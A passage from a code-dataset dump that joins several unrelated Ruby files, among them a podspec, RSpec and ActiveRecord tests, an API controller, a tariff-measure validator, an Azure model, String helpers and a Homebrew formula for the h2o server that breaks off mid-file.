  s.homepage         = 'https://github.com/Steven/CenfoWebAPICaller'
  # s.screenshots     = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
  s.license          = { :type => 'MIT', :file => 'LICENSE' }
  s.author           = { 'Steven' => 'Steven' }
  s.source           = { :git => 'https://github.com/Steven/CenfoWebAPICaller.git', :tag => s.version.to_s }
  # s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'

  s.ios.deployment_target = '9.0'

  s.source_files = 'CenfoWebAPICaller/Classes/**/*'

  # s.resource_bundles = {
  #   'CenfoWebAPICaller' => ['CenfoWebAPICaller/Assets/*.png']
  # }

  # s.public_header_files = 'Pod/Classes/**/*.h'
  # s.frameworks = 'UIKit', 'MapKit'
  # s.dependency 'AFNetworking', '~> 2.3'
end
| 37.930233 | 108 | 0.646842 |
7a91d2086b5717d4ad58202462bcc2f445fe9bb4 | 207 | require "sequel"
# JRuby talks to SQLite through the JDBC driver; every other interpreter uses
# the native sqlite adapter. Either way we get a throwaway in-memory database.
connection_string =
  if RUBY_PLATFORM.match?(/java/)
    "jdbc:sqlite::memory:"
  else
    "sqlite::memory:"
  end

SEQUEL_DB = Sequel.connect(connection_string)
require_relative "./schema"
require_relative "./models"
| 15.923077 | 33 | 0.68599 |
212ce92420359e19d600b309b871ab610c1eca38 | 81 | class Request < ActiveRecord::Base
include Referrer::TrackedModelAdditions
end
| 20.25 | 41 | 0.82716 |
d5635222cdbfcc4920c1603330c140c4136fe88b | 3,297 | require 'spec_helper'
require 'presenters/v3/to_many_relationship_presenter'
module VCAP::CloudController::Presenters::V3
  RSpec.describe ToManyRelationshipPresenter do
    # Minimal stand-in exposing only the #guid the presenter reads.
    class ToManyRelationship
      def initialize(guid)
        @guid = guid
      end

      def guid
        @guid.to_s
      end
    end

    # Builds `count` relationships with guids "1".."count".
    def generate_relationships(count)
      relationships = []

      (1..count).each do |i|
        relationships << ToManyRelationship.new(i)
      end

      relationships
    end

    let(:data) { [] }
    let(:build_related) { true }
    let(:relation_url) { 'cash/guid' }
    let(:relationship_path) { 'money' }
    let(:decorators) { [] }

    subject(:relationship_presenter) { ToManyRelationshipPresenter.new(relation_url, data, relationship_path, build_related: build_related, decorators: decorators) }
    let(:url_builder) { VCAP::CloudController::Presenters::ApiUrlBuilder }

    describe '#to_hash' do
      let(:result) { relationship_presenter.to_hash }

      context 'when there are no relationships' do
        it 'does not populate the relationships' do
          expect(result[:data]).to be_empty
        end

        # Both self and related links are emitted by default.
        it 'provides a links section' do
          expect(result[:links]).to eq({
            self: {
              href: url_builder.build_url(path: "/v3/#{relation_url}/relationships/#{relationship_path}")
            },
            related: {
              href: url_builder.build_url(path: "/v3/#{relation_url}/#{relationship_path}")
            }
          }
          )
        end
      end

      context 'when there is relationship data' do
        context 'a single relationship' do
          let(:data) { generate_relationships(1) }

          it 'returns a list of guids for the single relationship' do
            expect(result[:data]).to eq(
              [
                { guid: '1' }
              ]
            )
          end
        end

        context 'for multiple relationships' do
          let(:data) { generate_relationships(5) }

          it 'returns a list of guids for each relationship' do
            expect(result[:data]).to eq(
              [
                { guid: '1' },
                { guid: '2' },
                { guid: '3' },
                { guid: '4' },
                { guid: '5' }
              ]
            )
          end
        end
      end

      # build_related: false suppresses the `related` link.
      context 'when build_related is false' do
        let(:build_related) { false }

        it 'does not include a related field in links' do
          expect(result[:links]).to eq({
            self: {
              href: url_builder.build_url(path: "/v3/#{relation_url}/relationships/#{relationship_path}")
            }
          })
        end
      end

      # Decorators may merge extra top-level keys (e.g. :included) into the hash.
      context 'when a decorator is provided' do
        let(:fake_decorator) { double }
        let(:impl) do
          ->(hash, resources) do
            hash.tap { |h| h[:included] = { resource: { guid: "included #{resources[0].guid}" } } }
          end
        end
        before { allow(fake_decorator).to receive(:decorate, &impl) }

        let(:decorators) { [fake_decorator] }
        let(:data) { generate_relationships(1) }

        it 'uses the decorator' do
          expect(result[:included]).to match({ resource: { guid: 'included 1' } })
        end
      end
    end
  end
end
| 28.669565 | 165 | 0.548377 |
6acd889dddc5ca2ab6c0388a2e2603cc16a9ba02 | 1,412 | require 'cases/helper'
require 'models/topic'
class InvalidDateTest < ActiveRecord4116::TestCase
  # Multi-parameter date assignment ("last_read(1i)" year, "(2i)" month,
  # "(3i)" day) should accept valid calendar dates verbatim and silently
  # coerce impossible ones (e.g. Nov 31) via Time's rollover behaviour
  # instead of raising.
  def test_assign_valid_dates
    valid_dates = [[2007, 11, 30], [1993, 2, 28], [2008, 2, 29]]
    invalid_dates = [[2007, 11, 31], [1993, 2, 29], [2007, 2, 29]]

    valid_dates.each do |date_src|
      topic = Topic.new("last_read(1i)" => date_src[0].to_s, "last_read(2i)" => date_src[1].to_s, "last_read(3i)" => date_src[2].to_s)
      # Oracle DATE columns are datetime columns and Oracle adapter returns Time value
      if current_adapter?(:OracleAdapter)
        assert_equal(topic.last_read.to_date, Date.new(*date_src))
      else
        assert_equal(topic.last_read, Date.new(*date_src))
      end
    end

    invalid_dates.each do |date_src|
      assert_nothing_raised do
        topic = Topic.new({"last_read(1i)" => date_src[0].to_s, "last_read(2i)" => date_src[1].to_s, "last_read(3i)" => date_src[2].to_s})
        # Oracle DATE columns are datetime columns and Oracle adapter returns Time value
        if current_adapter?(:OracleAdapter)
          assert_equal(topic.last_read.to_date, Time.local(*date_src).to_date, "The date should be modified according to the behavior of the Time object")
        else
          assert_equal(topic.last_read, Time.local(*date_src).to_date, "The date should be modified according to the behavior of the Time object")
        end
      end
    end
  end
end
| 42.787879 | 154 | 0.67847 |
38f59acf957ba96159663db6166ca0d57a32e5e7 | 1,276 | # ba_tester
#
# This file was automatically generated by APIMATIC v2.0
# ( https://apimatic.io ).
module BaTester
  # Shared plumbing for generated endpoint controllers: holds the client
  # configuration, an optional HTTP call-back hook, and the request
  # execution/validation pipeline.
  class BaseController
    attr_accessor :config, :http_call_back

    def initialize(config, http_call_back: nil)
      @config = config
      @http_call_back = http_call_back

      # Headers appended to every outgoing request.
      @global_headers = { 'user-agent' => 'APIMATIC 3.0' }
    end

    # Raises ArgumentError for the first parameter whose value is nil.
    def validate_parameters(args)
      args.each do |name, value|
        next unless value.nil?
        raise ArgumentError, "Required parameter #{name} cannot be nil."
      end
    end

    # Sends a request through the configured HTTP client, invoking the
    # optional call-back before and after, and returns the raw response.
    def execute_request(request, binary: false)
      @http_call_back&.on_before_request(request)

      APIHelper.clean_hash(request.headers)
      request.headers.merge!(@global_headers)

      client = config.http_client
      response =
        if binary
          client.execute_as_binary(request)
        else
          client.execute_as_string(request)
        end
      @http_call_back&.on_after_response(response)

      response
    end

    # Raises APIException unless the status code is a 2xx success code.
    def validate_response(response)
      return if response.status_code.between?(200, 208) # [200,208] = HTTP OK
      raise APIException.new 'HTTP Response Not OK', response
    end
  end
end
| 26.583333 | 88 | 0.628527 |
ede2ef058963489360cacd070914a56d59cbef21 | 246 | # frozen_string_literal: true
module Subjective
  # Abstract superclass for validator strategies. A concrete strategy is
  # constructed with the context class whose instances it will validate.
  class ValidatorStrategy
    # The context class this strategy was built for.
    attr_reader :context_klass

    def initialize(klass)
      @context_klass = klass
    end
  end
end
| 16.4 | 40 | 0.727642 |
1d12caf2a17bc2e9050796cfe659fbf7e9fee1ec | 78 | class Target < ActiveResource::Base
self.site = "http://localhost:3001/"
end | 26 | 38 | 0.730769 |
7abefd9f4ee72d4213c7dd93d6f717b177c19506 | 23,707 | class MeasureValidator < TradeTariffBackend::Validator
validation :ME1, 'The combination of measure type + geographical area + goods classification item id + additional code type + additional code + order number + reduction indicator + start date must be unique.', on: %i[create update], if: ->(record) { record.not_update_of_the_same_measure? } do
validates :uniqueness, of: %i[measure_type_id geographical_area_sid goods_nomenclature_sid additional_code_type_id additional_code_id ordernumber reduction_indicator validity_start_date]
end
validation :ME2, 'The measure type must exist.', on: %i[create update] do |record|
MeasureType.actual(include_future: true).where(measure_type_id: record.measure_type_id).any?
end
validation :ME3, 'The validity period of the measure type must span the validity period of the measure.', on: %i[create update] do
validates :validity_date_span, of: :measure_type, extend_message: true
end
validation :ME4, 'The geographical area must exist.', on: %i[create update] do
validates :presence, of: :geographical_area
end
validation :ME5, 'The validity period of the geographical area must span the validity period of the measure.', on: %i[create update] do
validates :validity_date_span, of: :geographical_area, extend_message: true
end
validation :ME6, 'The goods code must exist.',
on: %i[create update],
if: ->(record) {
# NOTE wont apply to national invalidates Measures
# Taric may delete a Goods Code and national measures will be invalid.
# ME9 If no additional code is specified then the goods code is mandatory (do not validate if additional code is there)
# do not validate for export refund nomenclatures
# do not validate for if related to meursing additional code type
# do not validate for invalidated national measures (when goods code is deleted by Taric, and CHIEF measures are left orphaned-invalidated)
(
record.additional_code.blank? &&
record.export_refund_nomenclature.blank? &&
(!record.national? || !record.invalidated?)
) &&
(record.additional_code_type.present? &&
!record.additional_code_type.meursing?)
} do
validates :presence, of: :goods_nomenclature
end
validation :ME7, 'The goods classification code must be a product code; that is, it may not be an intermediate line.', on: %i[create update] do |record|
# NOTE wont apply to national invalidates Measures
# Taric may delete a Goods Code and national measures will be invalid.
(record.national? && record.invalidated?) ||
record.goods_nomenclature.blank? ||
(record.goods_nomenclature.present? && record.goods_nomenclature.producline_suffix == "80") || (
record.export_refund_nomenclature.present? && record.export_refund_nomenclature.productline_suffix == "80"
)
end
validation :ME8, 'The validity period of the goods code must span the validity period of the measure.',
on: %i[create update] do
validates :validity_date_span, of: :goods_nomenclature, extend_message: true
end
validation :ME9, 'If no additional code is specified then the goods code is mandatory.', on: %i[create update] do |record|
record.additional_code_id.present? || (record.additional_code_id.blank? && record.goods_nomenclature_item_id.present?)
end
validation :ME10, 'The order number must be specified if the "order number flag" (specified in the measure type record) has the value "mandatory". If the flag is set to "not permitted" then the field cannot be entered.', on: %i[create update] do |record|
measure_type = MeasureType.actual(include_future: true).where(measure_type_id: record.measure_type_id).first
measure_type.present? &&
((record.ordernumber.present? && measure_type.order_number_capture_code == 1) ||
(record.ordernumber.blank? && measure_type.order_number_capture_code != 1))
end
validation :ME12, 'If the additional code is specified then the additional code type must have a relationship with the measure type.',
on: %i[create update],
extend_message: ->(record) { record.measure_sid.present? ? "{ measure_sid=>\"#{record.measure_sid}\" }" : nil } do |record|
(record.additional_code_type.present? && AdditionalCodeTypeMeasureType.where(additional_code_type_id: record.additional_code_type_id,
measure_type_id: record.measure_type_id).any?) ||
record.additional_code_type.blank?
end
validation :ME13, 'If the additional code type is related to a Meursing table plan then only the additional code can be specified: no goods code, order number or reduction indicator.', on: %i[create update] do |record|
(record.additional_code_type.present? &&
record.additional_code_type.meursing? &&
record.meursing_additional_code.present? &&
record.goods_nomenclature_item_id.blank? &&
record.ordernumber.blank? &&
record.reduction_indicator.blank?) ||
(record.additional_code_type.present? && !record.additional_code_type.meursing?) ||
record.additional_code_type.blank?
end
validation :ME14, 'If the additional code type is related to a Meursing table plan then the additional code must exist as a Meursing additional code.', on: %i[create update] do |record|
(record.additional_code_type.present? &&
record.additional_code_type.meursing? &&
record.meursing_additional_code.present?
) || (
record.additional_code_type.present? && !record.additional_code_type.meursing?
) ||
record.additional_code_type.blank?
end
# FIXME: https://trello.com/c/COQPnHr2/602-dit-tq-128-edit-quota-measures-is-throwing-with-conformance-errors-needs-to-check-if-these-are-valid-me16-and-me119-6
# validation :ME16,
# %(Integrating a measure with an additional code when an equivalent or overlapping
# measures without additional code already exists and vice-versa, should be forbidden.),
# on: [:create, :update] do |record|
# valid = true
#
# attrs = {
# goods_nomenclature_item_id: record.goods_nomenclature_item_id,
# goods_nomenclature_sid: record.goods_nomenclature_sid,
# measure_type_id: record.measure_type_id,
# geographical_area_sid: record.geographical_area_sid,
# ordernumber: record.ordernumber,
# reduction_indicator: record.reduction_indicator,
# additional_code_type_id: record.additional_code_type_id,
# additional_code_id: record.additional_code_id
# }
#
# if record.modified?
# scope = Measure.where(attrs)
# scope = scope.where("measure_sid != ?", record.measure_sid) if record.measure_sid.present?
#
# if record.updating_measure.present?
# scope = scope.where("measure_sid != ?", record.updating_measure.measure_sid)
# end
#
# scope = if record.validity_end_date.present?
# scope.where(
# "(validity_start_date <= ? AND (validity_end_date >= ? OR validity_end_date IS NULL)) OR
# (validity_start_date >= ? AND (validity_end_date <= ? OR validity_end_date IS NULL))",
# record.validity_start_date, record.validity_start_date,
# record.validity_start_date, record.validity_end_date,
# )
# else
# scope.where(
# "(validity_start_date <= ? AND (validity_end_date >= ? OR validity_end_date IS NULL))",
# record.validity_start_date, record.validity_start_date,
# )
# end
#
# valid = scope.count.zero?
# end
#
# valid
# end
validation :ME17, "If the additional code type has as application 'non-Meursing' then the additional code must exist as a non-Meursing additional code.",
on: %i[create update],
if: ->(record) { record.additional_code_type.present? && record.additional_code_type.non_meursing? } do |record|
record.additional_code.present?
end
validation :ME19,
%(If the additional code type has as application 'ERN' then the goods code must be specified
but the order number is blocked for input.),
on: %i[create update],
if: ->(record) { record.additional_code_type.present? && record.additional_code_type.application_code.in?("0") } do |record|
record.goods_nomenclature_item_id.present? && record.ordernumber.blank?
end
validation :ME21,
%(If the additional code type has as application 'ERN' then the combination of goods code + additional code
must exist as an ERN product code and its validity period must span the validity period of the measure),
on: %i[create update],
if: ->(record) {
record.additional_code_type.present? &&
record.additional_code_type.application_code.present? &&
record.additional_code_type.application_code.in?("0") &&
record.goods_nomenclature_item_id.present? && record.additional_code.present?
} do
validates :validity_date_span, of: :additional_code_type, extend_message: true
end
#validation :ME24, 'The role + regulation id must exist. If no measure start date is specified it defaults to the regulation start date.', on: [:create, :update] do
#validates :presence, of: [:measure_generating_regulation_id, :measure_generating_regulation_role]
#end
validation :ME25, "If the measure's end date is specified (implicitly or explicitly) then the start date of the measure must be less than or equal to the end date.",
on: %i[create update],
if: ->(record) { (record.national? && !record.invalidated?) || !record.national? } do
validates :validity_dates
end
validation :ME26, 'The entered regulation may not be completely abrogated.' do
validates :exclusion, of: %i[measure_generating_regulation_id
measure_generating_regulation_role],
from: -> {
CompleteAbrogationRegulation.select(:complete_abrogation_regulation_id,
:complete_abrogation_regulation_role)
}
end
validation :ME27, 'The entered regulation may not be fully replaced.', on: %i[create update] do |record|
record.generating_regulation.present? && !record.generating_regulation.fully_replaced?
end
validation :ME29, 'If the entered regulation is a modification regulation then its base regulation may not be completely abrogated.', on: %i[create update] do |record|
(record.generating_regulation.is_a?(ModificationRegulation) && record.modification_regulation.base_regulation.not_completely_abrogated?) ||
!record.generating_regulation.is_a?(ModificationRegulation)
end
validation :ME32,
%(There may be no overlap in time with other measure occurrences with a goods code in the
same goods classification hierarchy which references the same measure type, geo area, order number,
additional code and reduction indicator. This rule is not applicable for Meursing additional
codes.),
on: %i[create update],
extend_message: ->(record) { record.measure_sid.present? ? "{ measure_sid=>\"#{record.measure_sid}\" }" : nil },
if: ->(record) { record.additional_code.present? && record.additional_code_type.present? && record.additional_code_type.non_meursing? } do |record|
record.duplicates_by_attributes.count.zero?
end
validation [:ME33, :ME34], 'A justification regulation may not be entered if the measure end date is not filled in
A justification regulation must be entered if the measure end date is filled in.', on: %i[create update] do |record|
(record[:validity_end_date].blank? &&
record.justification_regulation_id.blank? &&
record.justification_regulation_role.blank?) ||
(record[:validity_end_date].present? &&
record.justification_regulation_id.present? &&
record.justification_regulation_role.present?)
end
validation :ME39, "The validity period of the measure must span the validity period of all related partial temporary stop (PTS) records.", on: %i[create update] do
validates :validity_date_span, of: :measure_partial_temporary_stops
end
#
# NEED_TO_CHECK
#
# validation :ME40,
# %(If the flag "duty expression" on measure type is "mandatory" then at least one measure component
# or measure condition component record must be specified. If the flag is set "not permitted" then
# no measure component or measure condition component must exist. Measure components and measure
# condition components are mutually exclusive. A measure can have either components or condition
# components (if the ‘duty expression’ flag is ‘mandatory’ or ‘optional’) but not both.),
# on: [:create, :update] do |record|
# valid = true
# if record.measure_type.try(:measure_component_applicable_code) == 1 # mandatory
# valid = !record.measure_components.empty? || record.measure_conditions.any? { |mc| !mc.measure_condition_components.empty? }
# end
# if record.measure_type.try(:measure_component_applicable_code) == 2 # not permitted
# valid = record.measure_components.empty? && record.measure_conditions.all? { |mc| mc.measure_condition_components.empty? }
# end
# valid
# end
validation :ME86, 'The role of the entered regulation must be a Base, a Modification, a Provisional Anti-Dumping, a Definitive Anti-Dumping.', on: %i[create update] do
validates :inclusion, of: :measure_generating_regulation_role, in: Measure::VALID_ROLE_TYPE_IDS
end
# validation :ME87,
# %(The validity period of the measure (implicit or explicit) must reside
# within the effective validity period of its supporting regulation. The
# effective validity period is the validity period of the regulation taking
# into account extensions and abrogation.), on: [:create, :update] do |record|
# valid = record.validity_start_date.present?
# if valid
# if record.validity_end_date.present? && record.generating_regulation_id.present
# generating_regulation = record.generating_regulation
# regulation_start_date = generating_regulation.validity_start_date
# regulation_end_date = generating_regulation.effective_end_date.presence ||
# generating_regulation.validity_end_date
# valid = (regulation_start_date <= record.validity_start_date) &&
# (regulation_end_date >= record.validity_end_date)
# end
# end
# valid
# end
validation :ME88, 'The level of the goods code, if present, cannot exceed the explosion level of the measure type.', on: %i[create update] do |record|
# NOTE wont apply to national invalidates Measures
# Taric may delete a Goods Code and national measures will be invalid.
# TODO is not applicable for goods indent numbers above 10?
(record.national? && record.invalidated?) ||
(record.goods_nomenclature.blank? && record.export_refund_nomenclature.blank?) ||
(MeasureType.actual(include_future: true).where(measure_type_id: record.measure_type_id).any? &&
(record.goods_nomenclature.present? &&
GoodsNomenclatureIndent.where(goods_nomenclature_sid: record.goods_nomenclature_sid).where(
Sequel.lit('validity_start_date <= ?', record.validity_start_date)).where(
Sequel.lit('number_indents > 10 OR number_indents <= ?'), MeasureType.actual(include_future: true).where(measure_type_id: record.measure_type_id).first.measure_explosion_level).any?
) ||
(record.export_refund_nomenclature.present? &&
record.export_refund_nomenclature.number_indents.present? &&
(record.export_refund_nomenclature.number_indents > 10 ||
record.export_refund_nomenclature.number_indents <= MeasureType.actual(include_future: true).where(measure_type_id: record.measure_type_id).first.measure_explosion_level)))
end
validation :ME104,
%(The justification regulation must be either:
- the measure’s measure-generating regulation, or
- a measure-generating regulation, valid on the day after the measure’s (explicit) end date.
If the measure’s measure-generating regulation is ‘approved’, then so must be the justification regulation) do |record|
valid = true
justification_regulation_present = record.justification_regulation_id.present? &&
record.justification_regulation.present?
if justification_regulation_present
# CASE 1:
#
# The justification regulation must be either the measure’s measure-generating regulation
#
valid = record.justification_regulation_id == record.measure_generating_regulation_id &&
record.justification_regulation_role == record.measure_generating_regulation_role
end
# puts ""
# puts " VALID after CASE 1: #{valid}"
# puts ""
# CASE 2:
#
# OR measure-generating regulation should be valid on the day after the measure’s (explicit) end date.
#
unless valid
if record.measure_generating_regulation_id.present?
valid = if record.generating_regulation.validity_end_date.present? &&
record.validity_end_date.present?
# puts ""
# puts "CASE 2-1"
# puts ""
record.generating_regulation.validity_end_date > record.validity_end_date
else
# puts ""
# puts "CASE 2-2"
# puts ""
# puts " record.validity_end_date: #{record.validity_end_date}"
# puts ""
# puts " record.generating_regulation.validity_end_date: #{record.generating_regulation.validity_end_date}"
# puts ""
# This means measure is valid record as its validity end date is `nil`
(
record.validity_end_date.blank? &&
record.generating_regulation.validity_end_date.blank?
)
end
end
end
# puts ""
# puts " VALID after CASE 2: #{valid}"
# puts ""
unless valid
if justification_regulation_present
# CASE 3:
# If the measure’s measure-generating regulation is ‘approved’,
# then so must be the justification regulation
#
# In other words: both should have `approved_flag`
#
unless valid
if record.measure_generating_regulation_id.present?
valid = record.generating_regulation.approved_flag.present? &&
record.justification_regulation.approved_flag.present?
end
end
end
end
# puts ""
# puts " VALID after CASE 3: #{valid}"
# puts ""
valid
end
validation :ME112, "If the additional code type has as application 'Export Refund for Processed Agricultural Goods' then the measure does not require a goods code.",
on: %i[create update],
if: ->(record) { record.additional_code_type.present? && record.additional_code_type.application_code.in?("4") } do |record|
record.goods_nomenclature_item_id.blank?
end
validation :ME113, "If the additional code type has as application 'Export Refund for Processed Agricultural Goods' then the additional code must exist as an Export Refund for Processed Agricultural Goods additional code.",
on: %i[create update],
if: ->(record) { record.additional_code_type.present? && record.additional_code_type.application_code == "4" } do |record|
record.additional_code.present? &&
AdditionalCodeType.export_refund_for_processed_agricultural_goods_type_ids.include?(
record.additional_code.additional_code_type_id
)
end
validation :ME115, 'The validity period of the referenced additional code must span the validity period of the measure', on: %i[create update] do
validates :validity_date_span, of: :additional_code, extend_message: true
end
validation :ME116, 'When a quota order number is used in a measure then the validity period of the quota order number must span the validity period of the measure. This rule is only applicable for measures with start date after 31/12/2007.',
on: %i[create update],
if: ->(record) {
record.validity_start_date.present? &&
record.validity_start_date > Date.new(2007, 12, 31) &&
record.order_number.present? && record.ordernumber =~ /^09[012356789]/
} do
# Only quota order numbers managed by the first come first served principle are in scope; these order number are starting with '09'; except order numbers starting with '094'
validates :validity_date_span, of: :order_number, extend_message: true
end
#
# NEED_TO_CHECK
#
# Would not work in Create Quota as here can be multiple origins.
# Need backend rework
#
# validation :ME117,
# %{When a measure has a quota measure type then rhe origin must exist as a quota order number origin.
# This rule is only applicable for measures with start date after 31/12/2007. Only origins for quota
# order numbers managed by the first come first served principle are in scope; these order number are
# starting with '09'; except order numbers starting with '094'},
# on: [:create, :update],
# if: ->(record) {
# ( record.validity_start_date > Date.new(2007,12,31) ) && (
# record.ordernumber.present? && record.ordernumber[0,2] == "09" && record.ordernumber[0,3] != "094"
# )
# } do |record|
# record.quota_order_number.present? && record.quota_order_number.quota_order_number_origin.present?
# end
validation :ME118,
%(When a quota order number is used in a measure then the validity period of the quota order number must
span the validity period of the measure. This rule is only applicable for measures with start date after
31/12/2007. Only quota order numbers managed by the first come first served principle are in scope;
these order number are starting with '09'; except order numbers starting with '094'),
on: %i[create update],
if: ->(record) {
(record.validity_start_date > Date.new(2007, 12, 31)) &&
(record.order_number.present? && record.ordernumber =~ /^09[012356789]/) &&
(record.ordernumber[0, 2] == "09" && record.ordernumber[0, 3] != "094")
} do
validates :validity_date_span, of: :order_number, extend_message: true
end
# FIXME: https://trello.com/c/COQPnHr2/602-dit-tq-128-edit-quota-measures-is-throwing-with-conformance-errors-needs-to-check-if-these-are-valid-me16-and-me119-6
# validation :ME119,
# %(When a quota order number is used in a measure then the validity period of the quota order number origin must
# span the validity period of the measure. This rule is only applicable for measures with start date after
# 31/12/2007. Only origins for quota order numbers managed by the first come first served principle are in scope;
# these order number are starting with '09'; except order numbers starting with '094'),
# if: ->(record) {
# (record.validity_start_date > Date.new(2007,12,31)) &&
# (record.order_number.present? && record.ordernumber =~ /^09[012356789]/) &&
# (record.ordernumber[0,2] == "09" && record.ordernumber[0,3] != "094") &&
# (record.quota_order_number_origin.present?)
# } do
# validates :validity_date_span, of: :quota_order_number_origin, extend_message: true
# end
end
| 51.649237 | 295 | 0.696124 |
5d0e0c21aa8ad915e2d204814f59fabe1eec600e | 1,897 | module ActiveSupport #:nodoc:
module CoreExtensions #:nodoc:
module String #:nodoc:
# Makes it easier to access parts of a string, such as specific characters and substrings.
module Access
# Fetches the single character at +position+, treating the string as an
# array of characters (0-based). Out-of-range positions yield nil.
#
# Examples:
#   "hello".at(0)   # => "h"
#   "hello".at(4)   # => "o"
#   "hello".at(10)  # => nil
def at(position)
  slice(position, 1)
end
# Returns the tail of the string starting at +position+ (0-based),
# or nil when +position+ is past the end.
#
# Examples:
#   "hello".from(0)   # => "hello"
#   "hello".from(2)   # => "llo"
#   "hello".from(10)  # => nil
def from(position)
  slice(position..-1)
end
# Returns the head of the string up to and including +position+ (0-based).
# Positions past the end return the whole string.
#
# Examples:
#   "hello".to(0)   # => "h"
#   "hello".to(2)   # => "hel"
#   "hello".to(10)  # => "hello"
def to(position)
  slice(0..position)
end
# Returns the first character of the string, or the first +limit+ characters.
#
# Examples:
#   "hello".first      # => "h"
#   "hello".first(2)   # => "he"
#   "hello".first(10)  # => "hello"
#   "hello".first(0)   # => ""
def first(limit = 1)
  # Bug fix: with limit == 0 the old `self[0..(limit - 1)]` became
  # `self[0..-1]` and returned the entire string instead of "".
  return '' if limit == 0
  self[0..(limit - 1)]
end
# Returns the last character of the string, or the last +limit+ characters.
#
# Examples:
#   "hello".last      # => "o"
#   "hello".last(2)   # => "lo"
#   "hello".last(10)  # => "hello"
#   "hello".last(0)   # => ""
def last(limit = 1)
  # Bug fix: with limit == 0 the old `self[(-limit)..-1]` became
  # `self[0..-1]` (since -0 == 0) and returned the entire string.
  return '' if limit == 0
  # `|| self` covers limit > length, where the negative index is out of range.
  self[(-limit)..-1] || self
end
end
end
end
end
| 32.152542 | 132 | 0.488666 |
ed2194d1462e9fe0aefc2af57b51442a6eeb1c25 | 395 | class Admin::Resources::RolesController < Admin::ResourceController
include Paginatable
# GET action: re-orders the preloaded @roles relation when an explicit sort
# column is requested and no search query (:q) is active, so search results
# keep their own relevance ordering.
#
# NOTE(review): params[:sort_by] flows into the ORDER BY clause unescaped;
# make sure it is whitelisted upstream, otherwise this is SQL-injectable.
def index
  # Use && / ! instead of the low-precedence `and` / `not` keywords.
  if params[:sort_by] && !params[:q]
    @roles = @roles.reorder("#{params[:sort_by]} #{@sort_order}")
  end
end
private
# Strong-parameters whitelist: the role name plus nested attributes for
# role_permissions (id/permission_id for updates, _destroy for removal).
def permitted_attributes
  nested = { role_permissions_attributes: %i[id permission_id _destroy] }
  [:name, nested]
end
end
| 23.235294 | 76 | 0.696203 |
1de3ff456670732a818bb5541c93d0816d0cea74 | 4,111 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ServiceFabric::V6_4_0_36
module Models
#
# Load Information about a Service Fabric application.
#
# NOTE: AutoRest-generated model -- edits here are lost on regeneration.
# Plain data holder; serialization is driven entirely by self.mapper.
class ApplicationLoadInfo
include MsRestAzure
# @return [String] The identity of the application. This is an encoded
# representation of the application name. This is used in the REST APIs
# to identify the application resource.
# Starting in version 6.0, hierarchical names are delimited with the "\~"
# character. For example, if the application name is
# "fabric:/myapp/app1",
# the application identity would be "myapp\~app1" in 6.0+ and
# "myapp/app1" in previous versions.
attr_accessor :id
# @return [Integer] The minimum number of nodes for this application.
# It is the number of nodes where Service Fabric will reserve Capacity in
# the cluster which equals to ReservedLoad * MinimumNodes for this
# Application instance.
# For applications that do not have application capacity defined this
# value will be zero.
attr_accessor :minimum_nodes
# @return [Integer] The maximum number of nodes where this application
# can be instantiated.
# It is the number of nodes this application is allowed to span.
# For applications that do not have application capacity defined this
# value will be zero.
attr_accessor :maximum_nodes
# @return [Integer] The number of nodes on which this application is
# instantiated.
# For applications that do not have application capacity defined this
# value will be zero.
attr_accessor :node_count
# @return [Array<ApplicationMetricDescription>] List of application
# capacity metric description.
attr_accessor :application_load_metric_information
#
# Mapper for ApplicationLoadInfo class as Ruby Hash.
# This will be used for serialization/deserialization.
# Each entry maps a Ruby attribute to its wire name (serialized_name)
# and wire type; consumed by the MsRest serialization machinery.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ApplicationLoadInfo',
type: {
name: 'Composite',
class_name: 'ApplicationLoadInfo',
model_properties: {
id: {
client_side_validation: true,
required: false,
serialized_name: 'Id',
type: {
name: 'String'
}
},
minimum_nodes: {
client_side_validation: true,
required: false,
serialized_name: 'MinimumNodes',
type: {
name: 'Number'
}
},
maximum_nodes: {
client_side_validation: true,
required: false,
serialized_name: 'MaximumNodes',
type: {
name: 'Number'
}
},
node_count: {
client_side_validation: true,
required: false,
serialized_name: 'NodeCount',
type: {
name: 'Number'
}
},
application_load_metric_information: {
client_side_validation: true,
required: false,
serialized_name: 'ApplicationLoadMetricInformation',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ApplicationMetricDescriptionElementType',
type: {
name: 'Composite',
class_name: 'ApplicationMetricDescription'
}
}
}
}
}
}
}
end
end
end
end
| 34.258333 | 81 | 0.55461 |
338ec679650bc79d7ec542304dd565c828805c7c | 2,968 | class H2o < Formula
desc "HTTP server with support for HTTP/1.x and HTTP/2"
homepage "https://github.com/h2o/h2o/"
url "https://github.com/h2o/h2o/archive/v2.0.1.tar.gz"
sha256 "c53d11589c8c76491cf3a940b649d0a9cb27c36eb276963811ac1bc16cd2bf2c"
head "https://github.com/h2o/h2o.git"
bottle do
sha256 "94098881d7365c50168602b7c13051a8c7d5358a42264cde6ac0e6fd92d5c07c" => :el_capitan
sha256 "259d407c805cd3c9a0430041311cb107ff53ae2ae6dddc48962fa71edb77e428" => :yosemite
sha256 "b824dcb480da033cff14a5450f5dec23aa2e2a6828dfb3880d477a18c9f77eef" => :mavericks
end
option "with-libuv", "Build the H2O library in addition to the executable"
option "without-mruby", "Don't build the bundled statically-linked mruby"
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "openssl" => :recommended
depends_on "libressl" => :optional
depends_on "libuv" => :optional
depends_on "wslay" => :optional
# Builds h2o with CMake, optionally builds the static library (libuv),
# installs the binaries, and stages an example config/doc root.
def install
# https://github.com/Homebrew/homebrew-core/pull/1046
# https://github.com/Homebrew/brew/pull/251
ENV.delete("SDKROOT")
args = std_cmake_args
# Always use the brewed SSL library rather than the bundled one.
args << "-DWITH_BUNDLED_SSL=OFF"
args << "-DWITH_MRUBY=OFF" if build.without? "mruby"
system "cmake", *args
if build.with? "libuv"
system "make", "libh2o"
lib.install "libh2o.a"
end
system "make", "install"
(etc/"h2o").mkpath
(var/"h2o").install "examples/doc_root/index.html"
# Write up a basic example conf for testing.
(buildpath/"brew/h2o.conf").write conf_example
(etc/"h2o").install buildpath/"brew/h2o.conf"
end
# Minimal h2o configuration used by the formula's install and test steps:
# serve #{var}/h2o on port 8080. Simplified from examples/h2o/h2o.conf
# upstream.
def conf_example
  <<~EOS
    listen: 8080
